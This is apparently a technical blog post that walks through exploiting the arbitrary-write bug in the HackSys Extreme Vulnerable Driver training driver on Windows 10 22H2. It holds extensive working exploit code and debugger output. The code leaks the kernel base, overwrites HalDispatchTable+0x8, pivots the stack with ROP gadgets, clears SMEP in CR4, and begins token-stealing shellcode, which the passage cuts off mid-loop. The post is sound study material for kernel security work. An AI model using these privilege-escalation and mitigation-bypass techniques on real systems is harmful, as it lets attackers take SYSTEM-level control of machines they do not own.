HEVD on Win10 22H2 - Arbitrary Overwrite

Introduction

In order to get used to more modern kernel exploit mitigations, I decided to start digging into the HackSys Extreme Vulnerable Driver on an up-to-date version (22H2) of Windows 10. This post covers the thought-process, techniques used, and obstacles faced when exploiting an arbitrary write vulnerability on Windows 10 22H2.

Token stealing

In order to elevate the privileges of a process in Windows, we will be using a technique called token stealing. Every process in Windows has an access token. If we attach a kernel debugger, we can find a reference to this token in the _EPROCESS structure at _EPROCESS+0x4b8.

0: kd> dt nt!_EPROCESS
   +0x000 Pcb              : _KPROCESS
   +0x438 ProcessLock      : _EX_PUSH_LOCK
   +0x440 UniqueProcessId  : Ptr64 Void
...
   +0x4b0 ExceptionPortState : Pos 0, 3 Bits
   +0x4b8 Token            : _EX_FAST_REF

Using !process, we can find the _EPROCESS address of a process, after which we can see the contents of the access token.

0: kd> !process 0 0 system
PROCESS ffffdf88bce5d040
    SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
    DirBase: 001ad000  ObjectTable: ffffcb02d9443c80  HandleCount: 2835.
    Image: System

0: kd> dt _EX_FAST_REF ffffdf88bce5d040+0x4b8
nt!_EX_FAST_REF
   +0x000 Object           : 0xffffcb02`d948c6ae Void
   +0x000 RefCnt           : 0y1110
   +0x000 Value            : 0xffffcb02`d948c6ae

As we can see, the token is stored as an _EX_FAST_REF (‘Executive Fast Reference’). This is a union, meaning all of its members (Object, RefCnt and Value) share the same memory location, which is why every member is listed at offset +0x000. On 64-bit Windows the low 4 bits of the value hold RefCnt, and the remaining bits are the pointer to the token object.
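The split between pointer and reference count can be illustrated with a few lines of C. This is a minimal sketch, assuming the 64-bit layout shown in the debugger output above (a 4-bit RefCnt in the low bits); the helper names are made up for illustration and are not part of any Windows API.

```c
#include <stdint.h>

/* Low 4 bits of an _EX_FAST_REF on x64 hold RefCnt; the rest is the object pointer. */
#define EX_FAST_REF_REFCNT_MASK 0xFULL

/* Hypothetical helper: strip RefCnt to recover the 16-byte-aligned object address. */
static uint64_t fast_ref_object(uint64_t value) {
    return value & ~EX_FAST_REF_REFCNT_MASK;
}

/* Hypothetical helper: extract the cached reference count. */
static unsigned fast_ref_refcnt(uint64_t value) {
    return (unsigned)(value & EX_FAST_REF_REFCNT_MASK);
}
```

Applied to the value 0xffffcb02`d948c6ae from the output above, this yields the object address 0xffffcb02`d948c6a0 and a RefCnt of 0xe, which matches the 0y1110 shown by the debugger.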

By applying this knowledge, token stealing is nothing more than grabbing the value which exists at [_EPROCESS+0x4b8] and copying it to another [_EPROCESS+0x4b8]. In order to check if these claims are correct, we can simulate this in a kernel debugger.

First we open a command prompt.

Next, we grab the _EPROCESS of both the cmd.exe and system process.

0: kd> !process 0 0 cmd.exe
PROCESS ffffdf88c4ca0080
    SessionId: 1  Cid: 1cc8    Peb: 686edd000  ParentCid: 10d8
    DirBase: b0291000  ObjectTable: ffffcb02df0e8d80  HandleCount:  74.
    Image: cmd.exe

0: kd> !process 0 0 system
PROCESS ffffdf88bce5d040
    SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
    DirBase: 001ad000  ObjectTable: ffffcb02d9443c80  HandleCount: 2878.
    Image: System

And finally, we write the system token value to the cmd.exe token location.

0: kd> eq ffffdf88c4ca0080+4b8 poi(ffffdf88bce5d040+4b8)

That’s it, you have now performed token stealing! But in order to apply this same technique in code, we need to be able to get a reference to the _EPROCESS structure.

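On 64-bit Windows, we can use the GS segment register. In kernel mode, GS points to the processor control region (_KPCR), and the pointer to the current _ETHREAD / _KTHREAD is stored at GS:[0x188].

note: Just like the _EPROCESS / _KPROCESS structures, the _ETHREAD / _KTHREAD structures start at the same address. The _KTHREAD is the first member of the _ETHREAD, just as the _KPROCESS (Pcb, at +0x000) is the first member of the _EPROCESS.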

0: kd> ? poi(gs:[0x188])
Evaluate expression: -8770215056896 = fffff806`06726a00

0: kd> !thread
THREAD fffff80606726a00  Cid 0000.0000  Teb: 0000000000000000 Win32Thread: 0000000000000000 RUNNING on processor 0
...
Owning Process            fffff80606723a00       Image:         Idle

As we can see, the address shown by the !thread command matches the address pointed to by GS:[0x188], and the command also gives us the owning process of the current thread. Looking at the _KTHREAD structure, it holds a member called ApcState at _KTHREAD+0x098.

0: kd> dt nt!_KTHREAD poi(gs:[0x188])
   +0x000 Header           : _DISPATCHER_HEADER
   +0x018 SListFaultAddress : (null) 
...
   +0x098 ApcState         : _KAPC_STATE
   +0x098 ApcStateFill     : [43]  "???"

If we have a look inside this structure, we can see that it actually holds a reference to the _KPROCESS structure at _KAPC_STATE+0x20, which as we noted earlier resides at the same address as the _EPROCESS structure.

0: kd> dt nt!_KAPC_STATE poi(gs:[0x188])+0x98
   +0x000 ApcListHead      : [2] _LIST_ENTRY [ 0xfffff806`06726a98 - 0xfffff806`06726a98 ]
   +0x020 Process          : 0xffffdf88`bce5d040 _KPROCESS
   +0x028 InProgressFlags  : 0 ''
...

So what does this give us?

This means we can use poi ( GS:[0x188] ) to get a pointer to the current _ETHREAD / _KTHREAD, and poi ( _KTHREAD+0xb8 ) (0x98 + 0x20) to get a pointer to the _EPROCESS / _KPROCESS. In other words, poi ( poi ( GS:[0x188] ) + 0xb8 ) should always give us the current _EPROCESS address, and the same two reads can be performed from code.

PROCESS ffffdf88bce5d040
    SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
    DirBase: 001ad000  ObjectTable: ffffcb02d9443c80  HandleCount: 3067.
    Image: System

0: kd> ? poi ( poi ( GS:[0x188] ) + 0xb8 )
Evaluate expression: -35696598986688 = ffffdf88`bce5d040
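The two-step pointer chase can be modelled in plain user-mode C. The following is only a sketch: it operates on a mock byte buffer standing in for a _KTHREAD, the offsets are the ones from the dt output above (they are specific to this build), and the function names are hypothetical.

```c
#include <stdint.h>
#include <string.h>

/* Offsets taken from the dt output above (Windows 10 22H2 build used in this post). */
#define KTHREAD_APCSTATE_OFFSET    0x98
#define KAPC_STATE_PROCESS_OFFSET  0x20

/* Hypothetical helper: read a 64-bit value at base+offset, like WinDbg's poi(). */
static uint64_t poi(const uint8_t *base, size_t offset) {
    uint64_t value;
    memcpy(&value, base + offset, sizeof value);
    return value;
}

/* Follows _KTHREAD.ApcState.Process inside a mock _KTHREAD image. */
static uint64_t process_from_thread(const uint8_t *kthread) {
    return poi(kthread, KTHREAD_APCSTATE_OFFSET + KAPC_STATE_PROCESS_OFFSET);
}
```

The combined offset is 0x98 + 0x20 = 0xb8, which is the constant the shellcode later in this post uses.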

SMEP & SMAP

Now that we know how to steal access tokens through code, we have to talk about the first obstacles we will encounter: Supervisor Mode Execution Prevention (SMEP) and Supervisor Mode Access Prevention (SMAP). In a nutshell, these protections prevent the kernel from executing (SMEP) or accessing (SMAP) userland memory. If we look at many of the available HEVD writeups for Windows 7, a valid attack flow would be:

Create a buffer containing shellcode
Overwrite some pointer that is called from the kernel with the pointer to your buffer
Profit

SMEP now prevents this, because the userland allocated buffer is not executable from the kernel.

How do we bypass SMEP?

SMEP and SMAP are enabled through the CR4 register: bit 20 enables SMEP and bit 21 enables SMAP.

note: Bits are numbered from the right, starting at bit 0 for the least significant bit.

If we want to disable SMEP, we simply need to set bit 20 of the CR4 register to 0.

0: kd> .formats 0y0000000000000000000000000000000000000000001001010000111011111000
Evaluate expression:
  Hex:     00000000`00250ef8

Thus, changing CR4 to 0x250ef8 would disable SMEP.
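The bit arithmetic can be double-checked with a small C sketch. The starting value 0x350ef8 used in the note below is an assumption (it is simply 0x250ef8 with bit 20 set again; the post does not show the original register contents), and the helper names are made up for illustration.

```c
#include <stdint.h>

#define CR4_SMEP (1ULL << 20)  /* Supervisor Mode Execution Prevention */
#define CR4_SMAP (1ULL << 21)  /* Supervisor Mode Access Prevention */

/* Returns the CR4 value with only the SMEP bit cleared. */
static uint64_t cr4_clear_smep(uint64_t cr4) {
    return cr4 & ~CR4_SMEP;
}

/* Returns 1 if the given feature bit is set in cr4, 0 otherwise. */
static int cr4_has(uint64_t cr4, uint64_t flag) {
    return (cr4 & flag) != 0;
}
```

Under that assumption, cr4_clear_smep(0x350ef8) gives 0x250ef8. Note that bit 21 is still set in 0x250ef8, so this value only clears the SMEP bit.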

Arbitrary write

Now that we know what to do, let’s see what we’re dealing with. The vulnerability within HEVD we are targeting is an arbitrary write, meaning we can write what we want wherever we want. We need to find a location within the kernel where writing specific value(s) eventually allows us to steal the system token.

HalDispatchTable

The HalDispatchTable is a table of pointers related to HAL functionality within the Windows kernel. For a given build of ntoskrnl.exe, its location is a fixed offset from the kernel base address.

0: kd> dps nt!HalDispatchTable 
fffff806`06600a60  00000000`00000004
fffff806`06600a68  fffff806`0638f9d0 nt!HaliQuerySystemInformation
fffff806`06600a70  fffff806`0612ad60 nt!HalpSetSystemInformation
fffff806`06600a78  fffff806`0611d780 nt!ArbAddReserved
fffff806`06600a80  00000000`00000000
fffff806`06600a88  fffff806`0628dd20 nt!HalExamineMBR
fffff806`06600a90  fffff806`0628dee0 nt!IoReadPartitionTable
fffff806`06600a98  fffff806`0628e160 nt!IoSetPartitionInformation
fffff806`06600aa0  fffff806`0628e3b0 nt!IoWritePartitionTable
fffff806`06600aa8  fffff806`05c53f00 nt!SC_DEVICE::GetStoragePropertyPost
fffff806`06600ab0  fffff806`05d99f00 nt!EmpCheckErrataList
fffff806`06600ab8  fffff806`05d99f00 nt!EmpCheckErrataList
fffff806`06600ac0  fffff806`0619b830 nt!HaliInitPnpDriver
fffff806`06600ac8  fffff806`061a3200 nt!HaliInitPowerManagement
fffff806`06600ad0  fffff806`05d78e90 nt!HalPnpGetDmaAdapter
fffff806`06600ad8  fffff806`061ca790 nt!HaliGetInterruptTranslator

HalDispatchTable + 0x8

A common method for kernel exploitation is to overwrite HalDispatchTable+0x8 with a pointer to a buffer containing shellcode. The entry at HalDispatchTable+0x8 points to the nt!HaliQuerySystemInformation function and, if we look in the disassembler, is the pointer that KeQueryIntervalProfile calls.

0: kd> ? nt!HalDispatchTable - nt
Evaluate expression: 12585568 = 00000000`00c00a60

Checking the _guard_dispatch_icall function, we can see that it jumps to the function loaded in RAX.

By tracing back the KeQueryIntervalProfile function, we can see it gets called from NtQueryIntervalProfile.

NtQueryIntervalProfile is a function we are able to call from a userland process. Thus, if we overwrite HalDispatchTable+0x8 and call NtQueryIntervalProfile, it will eventually end up calling our overwritten value.

note: The ntdll NtQueryIntervalProfile is different from the ntoskrnl NtQueryIntervalProfile. The ntdll NtQueryIntervalProfile function uses a syscall to make the jump into the kernel.

In order to overwrite HalDispatchTable+0x8, we first retrieve the kernel base address.

typedef void (*NtQueryIntervalProfile_t)(int arg1, int arg2);

typedef struct SYSTEM_MODULE {
	ULONG                Reserved1;
	ULONG                Reserved2;
#ifdef _WIN64
	ULONG				Reserved3;
#endif
	PVOID                ImageBaseAddress;
	ULONG                ImageSize;
	ULONG                Flags;
	WORD                 Id;
	WORD                 Rank;
	WORD                 w018;
	WORD                 NameOffset;
	CHAR                 Name[MAXIMUM_FILENAME_LENGTH];
}SYSTEM_MODULE, * PSYSTEM_MODULE;

typedef struct SYSTEM_MODULE_INFORMATION {
	ULONG                ModulesCount;
	SYSTEM_MODULE        Modules[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

typedef enum _SYSTEM_INFORMATION_CLASS {
	SystemModuleInformation = 11
} SYSTEM_INFORMATION_CLASS;

typedef NTSTATUS(WINAPI* PNtQuerySystemInformation)(
	__in SYSTEM_INFORMATION_CLASS SystemInformationClass,
	__inout PVOID SystemInformation,
	__in ULONG SystemInformationLength,
	__out_opt PULONG ReturnLength
	);

PVOID GetKernelBase() {
	printf("[*] Getting the kernel base address\n");
	HMODULE ntdll = GetModuleHandle(TEXT("ntdll"));
	if (ntdll == NULL) {
		printf("[-] Failed to get a handle to ntdll\n");
		return NULL;
	}
	PNtQuerySystemInformation query = (PNtQuerySystemInformation)GetProcAddress(ntdll, "NtQuerySystemInformation");
	if (query == NULL) {
		printf("[-] Failed to get the NtQuerySystemInformation address\n");
		return NULL;
	}
	// The first call, with an empty buffer, only reports the required length
	ULONG len = 0;
	query(SystemModuleInformation, NULL, 0, &len);

	PSYSTEM_MODULE_INFORMATION pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);
	if (pModuleInfo == NULL) {
		printf("[-] Failed to allocate the SYSTEM_MODULE_INFORMATION buffer.\n");
		return NULL;
	}
	NTSTATUS status = query(SystemModuleInformation, pModuleInfo, len, &len);

	if (status != (NTSTATUS)0x0) {
		printf("[-] NtQuerySystemInformation failed with error code 0x%X\n", status);
		GlobalFree(pModuleInfo);
		return NULL;
	}
	// The first module in the list is treated as ntoskrnl
	PVOID KernelBase = pModuleInfo->Modules[0].ImageBaseAddress;
	GlobalFree(pModuleInfo);
	printf("[*] ntoskrnl: %p\n", KernelBase);
	return KernelBase;
}

Using this base address, we can retrieve the HalDispatchTable by adding the static offset.

PVOID GetHalDispatchTable(PVOID KernelBase) {
	printf("[*] Getting the HalDispatchTable\n");
	PVOID HalDispatchTable = AddPtrOffset(KernelBase, 0x00c00a60);
	printf("[*] HalDispatchTable: %p\n", HalDispatchTable);
	return HalDispatchTable;
}
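The AddPtrOffset helper is used throughout this post but its definition is not shown. A minimal sketch of what it is assumed to do (byte-wise pointer plus offset) is given below under a different name, together with two integer helpers that make it easy to check the arithmetic against the debugger output. All three names are hypothetical.

```c
#include <stdint.h>

/* Assumed shape of the post's AddPtrOffset helper: byte-wise pointer + offset. */
static void *AddPtrOffsetSketch(void *base, uint64_t offset) {
    return (void *)((uintptr_t)base + (uintptr_t)offset);
}

/* Same arithmetic on plain integers, convenient for checking against debugger output. */
static uint64_t kernel_va(uint64_t kernel_base, uint64_t offset) {
    return kernel_base + offset;
}

/* Address of entry n in a table of 8-byte pointers. */
static uint64_t table_slot(uint64_t table, unsigned n) {
    return table + 8ULL * n;
}
```

With the kernel base implied by the output above (0xfffff806`06600a60 - 0xc00a60 = 0xfffff806`05a00000), kernel_va returns 0xfffff806`06600a60 for the HalDispatchTable, and table_slot(..., 1) returns 0xfffff806`06600a68, the entry that holds the nt!HaliQuerySystemInformation pointer.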

Finally, we can get the address of the table entry that holds the HaliQuerySystemInformation pointer by adding the 0x8 offset (this step is trivial but has been separated for clarity).

PVOID GetHaliQuerySystemInformation(PVOID HalDispatchTable) {
	printf("[*] Getting the HaliQuerySystemInformation address\n");
	// This is the address of the table entry, not of the function itself
	PVOID HaliQuerySystemInformation = AddPtrOffset(HalDispatchTable, 0x8);
	printf("[*] HaliQuerySystemInformation: %p\n", HaliQuerySystemInformation);
	return HaliQuerySystemInformation;
}

We now have enough to overwrite the HaliQuerySystemInformation pointer. However, due to SMEP, we can’t overwrite this pointer with a userland buffer pointer without triggering a BSOD. Instead, we can overwrite it with any kernel address that is executable. If we had control over the stack contents, a common technique would be ROP, but we are only able to overwrite a single function pointer.

What if we can take control over the stack using a single ROP gadget?

Taking control over the stack

The plan

We figured out we are able to overwrite a function pointer with a valid kernel address in order to execute code. However, we are limited to a single gadget that has to give us control over the stack in order for us to continue our ROP chain. By overwriting indirectly callable kernel functions (such as nt!HaliQuerySystemInformation) that allow for arguments to be passed through, we might be able to find the right gadget that allows us to swap out an argument with the RSP register.

Lay of the land

Before we can start looking for gadgets we have to figure out how much control we have over the registers when jumping to the overwritten HalDispatchTable+0x8 pointer. In order to do so, we can simply overwrite it with a gadget containing an INT3 instruction. This allows us to quickly break once our gadget hits.

int WriteWhereWhat(HANDLE hFile, PVOID WriteWhere, PVOID WriteWhat) {
	PWRITE_WHAT_WHERE WriteWhatWhere = NULL;
	ULONG BytesReturned;

	WriteWhatWhere = (PWRITE_WHAT_WHERE)HeapAlloc(GetProcessHeap(),
		HEAP_ZERO_MEMORY,
		sizeof(WRITE_WHAT_WHERE));

	if (!WriteWhatWhere) {
		printf("[-] Failed To Allocate Memory: 0x%X\n", GetLastError());
		exit(EXIT_FAILURE);
	}
	else {
		printf("[+] Memory Allocated: 0x%p\n", WriteWhatWhere);
	}

	WriteWhatWhere->What = (PULONG_PTR)&WriteWhat;
	WriteWhatWhere->Where = (PULONG_PTR)WriteWhere;

	printf("[*] WriteWhereWhat(%p, %p, %p)\n", hFile, WriteWhere, &WriteWhat);

	int IOStatus = DeviceIoControl(hFile,
		HACKSYS_EVD_IOCTL_ARBITRARY_OVERWRITE,
		(LPVOID)WriteWhatWhere,
		sizeof(WRITE_WHAT_WHERE),
		NULL,
		0,
		&BytesReturned,
		NULL);

	HeapFree(GetProcessHeap(), 0, (LPVOID)WriteWhatWhere);
	WriteWhatWhere = NULL;

	// Nonzero on success (the BOOL result of DeviceIoControl)
	return IOStatus;
}



int main() {
	HANDLE hFile = NULL;
	LPCSTR FileName = (LPCSTR)DEVICE_NAME;

	// Get the kernel base address
	PVOID KernelBase = GetKernelBase();

	// Get the HalDispatchTable address
	PVOID HalDispatchTable = GetHalDispatchTable(KernelBase);

	// Get the HaliQuerySystemInformationAddress address
	PVOID HaliQuerySystemInformationAddress = GetHaliQuerySystemInformation(HalDispatchTable);


	__try {
		// Get the device handle
		printf("[+] Getting Device Driver Handle\n");
		printf("[+] Device Name: %s\n", FileName);

		hFile = GetDeviceHandle(FileName);

		if (hFile == INVALID_HANDLE_VALUE) {
			printf("\t\t[-] Failed Getting Device Handle: 0x%X\n", GetLastError());
			exit(EXIT_FAILURE);
		}
		else {
			printf("\t\t[+] Device Handle: 0x%p\n", hFile);
		}

		WriteWhereWhat(hFile, HaliQuerySystemInformationAddress, AddPtrOffset(KernelBase, 0x5bee0c)); // int3; ret; (1 found)

		typedef void (*PtrNtQueryIntervalProfile)(PVOID arg0, PVOID arg1);

		HMODULE ntdll = GetModuleHandle(TEXT("ntdll"));
		PtrNtQueryIntervalProfile _NtQueryIntervalProfile = (PtrNtQueryIntervalProfile)GetProcAddress(ntdll, "NtQueryIntervalProfile");
		if (_NtQueryIntervalProfile == NULL) {
			printf("[-] Failed to get address of NtQueryIntervalProfile.\n");
			exit(-1);
		}
		// Recognizable marker values so we can spot our arguments in the debugger
		_NtQueryIntervalProfile((PVOID)0x4141414141414141, (PVOID)0x4242424242424242);
	}
	__except (EXCEPTION_EXECUTE_HANDLER) {
		printf("[-] Exception: 0x%X\n", GetLastError());
		exit(EXIT_FAILURE);
	}

	return EXIT_SUCCESS;
}

Executing the above code, we can see that it successfully triggers the INT3 instruction and breaks into our debugger. However, it does not seem like we have any direct control over registers.

We can break on NtQueryIntervalProfile to verify this.

bp nt!NtQueryIntervalProfile

It appears our arguments do make it into the NtQueryIntervalProfile function. Analyzing the function further tells us two things. First, our second argument (RDX) is copied into RBX before both RCX and RDX are overwritten. Second, our arguments never reached the INT3 gadget because an access violation is triggered first, causing the exception handler to take over. The INT3 instruction we encountered earlier was triggered by another process calling NtQueryIntervalProfile.

Because the pointer is validated with a cmovb (conditional move if below) instruction before it is dereferenced, this code will fail if our second argument does not point to a readable userland buffer. In order to fix this, we can simply allocate some memory.

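PVOID UserlandBuffer = HeapAlloc(GetProcessHeap(), 0, 0x100);
if (UserlandBuffer == NULL) {
	printf("[-] Failed to allocate UserlandBuffer\n");
	exit(EXIT_FAILURE);
}
// &UserlandBuffer is itself a valid userland address (it holds the pointer to our heap buffer)
_NtQueryIntervalProfile((PVOID)0xdeadbeefdeadbeef, &UserlandBuffer);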
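The pointer check described above can be modelled in C. This is a sketch under assumptions: the disassembly is not reproduced in this post, so the comparison is assumed to be the usual probe against the highest user address (taken here to be 0x00007FFFFFFF0000 on x64), and the function name is hypothetical.

```c
#include <stdint.h>

/* Assumption: the user probe address on x64 Windows. */
#define MM_USER_PROBE_ADDRESS 0x00007FFFFFFF0000ULL

/*
 * Models the cmp + cmovb pair: the caller's pointer is only used if it is
 * below the probe address; otherwise the probe address itself is touched.
 */
static uint64_t probed_address(uint64_t user_pointer) {
    return user_pointer < MM_USER_PROBE_ADDRESS ? user_pointer
                                                : MM_USER_PROBE_ADDRESS;
}
```

Under this model, a marker value such as 0x4242424242424242 is replaced by the probe address, and touching that address is what raises the access violation. A pointer to real userland memory passes through unchanged.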

Running our exploit once again, we can see we now have control over the RBX register.

With direct control over the RBX register, we can look for gadgets that would allow us to transfer RBX into RSP. We can generate a list of gadgets using rp++.

./rp-lin -f ntoskrnl.exe --va 0 -r 5 > rop.txt

Looking through the list, we find the following gadget.

0x434f8d: push qword[rbx]; jmp qword[rsi + 0x39]; (1 found)

Because this gadget ends with a JMP, we can chain an extra gadget if we use some custom dynamically generated shellcode in order to manually set and preserve RSI before the function call.

void SetRSI(PVOID BufferLocation) {
    printf("[*] SetRSI(%p)\n", BufferLocation);
    // mov rsi, imm64 ; ret
    unsigned char code[11] = { 0x48, 0xBE, 0, 0, 0, 0, 0, 0, 0, 0, 0xC3 };
    // x64 is little-endian, so the pointer's bytes are already in imm64 order.
    // Copying them directly also works when the address contains zero bytes.
    memcpy(&code[2], &BufferLocation, sizeof(BufferLocation));
    void* exec = VirtualAlloc(NULL, sizeof code, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (exec == NULL) {
        printf("[-] Failed to allocate memory for the RSI stub\n");
        exit(EXIT_FAILURE);
    }
    memcpy(exec, code, sizeof code);
    ((void(*)(void))exec)();
    printf("[*] RSI should be set\n");
    return;
}
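The byte sequence that SetRSI builds can be looked at in isolation. The sketch below only encodes the instruction bytes into a caller-supplied array and never executes them; the function name and the size constant are made up for illustration.

```c
#include <stddef.h>
#include <stdint.h>

#define MOV_RSI_RET_SIZE 11

/* Writes `mov rsi, imm64; ret` into out and returns the number of bytes written. */
static size_t encode_mov_rsi_ret(uint8_t out[MOV_RSI_RET_SIZE], uint64_t imm64) {
    size_t n = 0;
    out[n++] = 0x48;                 /* REX.W prefix */
    out[n++] = 0xBE;                 /* mov rsi, imm64 */
    for (int i = 0; i < 8; i++)      /* immediate, least significant byte first */
        out[n++] = (uint8_t)(imm64 >> (8 * i));
    out[n++] = 0xC3;                 /* ret */
    return n;
}
```

Because each byte is written by index rather than appended to a C string, an address containing a 0x00 byte is encoded correctly as well.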

By placing a POP RSP gadget at the [RSI+0x39] location, we effectively create a PUSH [RBX], POP RSP chain, which sets RSP to the value stored in our controllable buffer. This ends up giving us control over the stack!

0x5b784e: pop rsp; ret; (1 found)

By using a seemingly unused read/writable location in the data section of ntoskrnl.exe, we can simply use this as our new custom stack location.

We can now implement these gadgets into our code so we can effectively start writing our ROP chain.

int main() {
	HANDLE hFile = NULL;
	LPCSTR FileName = (LPCSTR)DEVICE_NAME;

	// Get the kernel base address
	PVOID KernelBase = GetKernelBase();

	// Get the HalDispatchTable address
	PVOID HalDispatchTable = GetHalDispatchTable(KernelBase);

	// Get the HaliQuerySystemInformationAddress address
	PVOID HaliQuerySystemInformationAddress = GetHaliQuerySystemInformation(HalDispatchTable);

	// Create some distance between the RSI offset and our final buffer.
	PVOID RsiBufferLocation = AddPtrOffset(KernelBase, 0xCE9598 - 0x100);

	// Location of the RSI gadget
	PVOID RsiGadgetLocation = AddPtrOffset(RsiBufferLocation, 0x39);

	// Set the final buffer (ROP chain) location
	PVOID BufferLocation = AddPtrOffset(KernelBase, 0xCE9598);


	__try {
		// Get the device handle
		printf("[+] Getting Device Driver Handle\n");
		printf("[+] Device Name: %s\n", FileName);

		hFile = GetDeviceHandle(FileName);

		if (hFile == INVALID_HANDLE_VALUE) {
			printf("[-] Failed Getting Device Handle: 0x%X\n", GetLastError());
			exit(EXIT_FAILURE);
		}
		else {
			printf("[+] Device Handle: 0x%p\n", hFile);
		}

		// Overwrite HalDispatchTable entry with our first gadget
		WriteWhereWhat(hFile, HaliQuerySystemInformationAddress, AddPtrOffset(KernelBase, 0x434f8d)); // push qword[rbx]; jmp qword[rsi + 0x39]; (1 found)

		// Take control over the stack in our second gadget
		WriteWhereWhat(hFile, RsiGadgetLocation, AddPtrOffset(KernelBase, 0x5b784e)); // pop rsp; ret; (1 found)

		// Prepare our ROP chain
		WriteWhereWhat(hFile, BufferLocation, AddPtrOffset(KernelBase, 0x5bee0c)); // int3; ret; (1 found)
		WriteWhereWhat(hFile, (SIZE_T)BufferLocation + 0x8, AddPtrOffset(KernelBase, 0x5bee0c)); // int3; ret; (1 found)
		WriteWhereWhat(hFile, (SIZE_T)BufferLocation + 0x10, AddPtrOffset(KernelBase, 0x5bee0c)); // int3; ret; (1 found)
		WriteWhereWhat(hFile, (SIZE_T)BufferLocation + 0x18, AddPtrOffset(KernelBase, 0x5bee0c)); // int3; ret; (1 found)
		
		// Set RSI to the RsiBufferLocation
		SetRSI(RsiBufferLocation);

		typedef void (*PtrNtQueryIntervalProfile)(PVOID arg0, PVOID arg1);
		HMODULE ntdll = GetModuleHandle(TEXT("ntdll"));
		PtrNtQueryIntervalProfile _NtQueryIntervalProfile = (PtrNtQueryIntervalProfile)GetProcAddress(ntdll, "NtQueryIntervalProfile");
		if (_NtQueryIntervalProfile == NULL) {
			printf("[-] Failed to get address of NtQueryIntervalProfile.\n");
			exit(-1);
		}
		_NtQueryIntervalProfile(0xdeadbeefdeadbeef, &BufferLocation);

	}
	__except (EXCEPTION_EXECUTE_HANDLER) {
		printf("[-] Exception: 0x%X\n", GetLastError());
		exit(EXIT_FAILURE);
	}

	return EXIT_SUCCESS;
}
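The address arithmetic used for RsiBufferLocation, RsiGadgetLocation and BufferLocation can be checked in isolation. The sketch below works on offsets relative to the kernel base, using the constants from the code above; the function names and the overlap check are illustrative additions, not part of the original exploit.

```c
#include <stdint.h>

#define CHAIN_OFFSET  0xCE9598ULL  /* ROP chain start, relative to the kernel base */
#define RSI_BACKOFF   0x100ULL     /* distance placed in front of the chain */
#define GADGET_DISP   0x39ULL      /* displacement in jmp qword [rsi + 0x39] */

/* Offset of the value loaded into RSI. */
static uint64_t rsi_value_offset(void) {
    return CHAIN_OFFSET - RSI_BACKOFF;
}

/* Offset of the 8-byte slot that jmp qword [rsi + 0x39] reads its target from. */
static uint64_t jmp_target_slot_offset(void) {
    return rsi_value_offset() + GADGET_DISP;
}

/* Returns 1 if that slot stays clear of a chain of `entries` qwords. */
static int slot_clear_of_chain(unsigned entries) {
    uint64_t slot_start = jmp_target_slot_offset();
    uint64_t slot_end = slot_start + 8;
    uint64_t chain_end = CHAIN_OFFSET + 8ULL * entries;
    return slot_end <= CHAIN_OFFSET || slot_start >= chain_end;
}
```

The slot ends up at offset 0xCE94D1, which is below the chain start at 0xCE9598, so the chain entries written afterwards do not clobber the jump target.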

We can verify we have moved the stack pointer to our new ‘custom stack’ where we have written our INT3 gadgets, which we can now step through!

Disabling SMEP using ROP

Now that we are able to build and execute a ROP chain, we can use this chain in order to disable SMEP and execute our shellcode. Remember, SMEP is controlled by bit 20 of the CR4 register, so all we have to do is clear this bit.

// Disable SMEP
WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), AddPtrOffset(KernelBase, 0x51b5f5)); // pop rcx; ret; (1 found)
WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), 0x250ef8); // Cr4 with SMEP disabled
WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), AddPtrOffset(KernelBase, 0x9a63e3)); // mov cr4, rcx; ret; (1 found)
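The `offset += 0x8` idiom relies on offset starting at -0x8, so that the first write lands at offset 0x0 and every following write lands 8 bytes further. A small sketch of that bookkeeping is shown below; the local array merely stands in for the buffer, and the type and function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define CHAIN_MAX 16

typedef struct {
    uint64_t slots[CHAIN_MAX];
    int offset;              /* byte offset of the last slot written; starts at -8 */
} chain_t;

static void chain_init(chain_t *c) {
    c->offset = -0x8;
}

/* Mirrors `BufferLocation + (offset += 0x8)`: advance first, then store.
 * Returns the byte offset that was used for this entry. */
static int chain_push(chain_t *c, uint64_t value) {
    c->offset += 0x8;
    assert(c->offset / 8 < CHAIN_MAX);
    c->slots[c->offset / 8] = value;
    return c->offset;
}
```

Three pushes after chain_init use offsets 0x0, 0x8 and 0x10, which is the layout the three writes above produce.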

Along with setting the CR4 register, we can restore the HalDispatchTable entry we have overwritten by taking the offset of nt!HaliQuerySystemInformation from the kernel base and writing the resulting address back to its original location.

// Restore HaliQuerySystemInformation
WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), AddPtrOffset(KernelBase, 0x57adf1)); // pop rcx; ret; (1 found)
WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), AddPtrOffset(KernelBase, 0x098f9d0)); // Address of the HaliQuerySystemInformation function
WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), AddPtrOffset(KernelBase, 0x5e602d)); // pop rdx; ret; (1 found)
WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), HaliQuerySystemInformationAddress); // Location where HaliQuerySystemInformation should be
WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), AddPtrOffset(KernelBase, 0x7567b8)); // xor eax, eax; mov qword[rdx], rcx; ret; (1 found)

Next we can simply return into a userland executable buffer in order to execute shellcode.

// Exec shellcode
WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), ShellcodeBuffer); // Jump to our shellcode

This allows us to continue execution in our ShellcodeBuffer. In order to write shellcode I will be using MASM, which allows you to link functions written in assembly.

extern int shellcode_buf;

shellcode.asm

.code
shellcode_buf PROC
    mov  rax, gs:[0188h]   ; _KTHREAD
    mov rax,  QWORD PTR [rax + 0b8h]   ; Current _EPROCESS
    mov rbx, rax      ; Copy _EPROCESS to rbx
    __loop:
      mov rbx, [rbx + 0448h]    ; Follow ActiveProcessLinks to the next process' list entry
      sub rbx, 0448h        ; Step back from the list entry to the start of that _EPROCESS
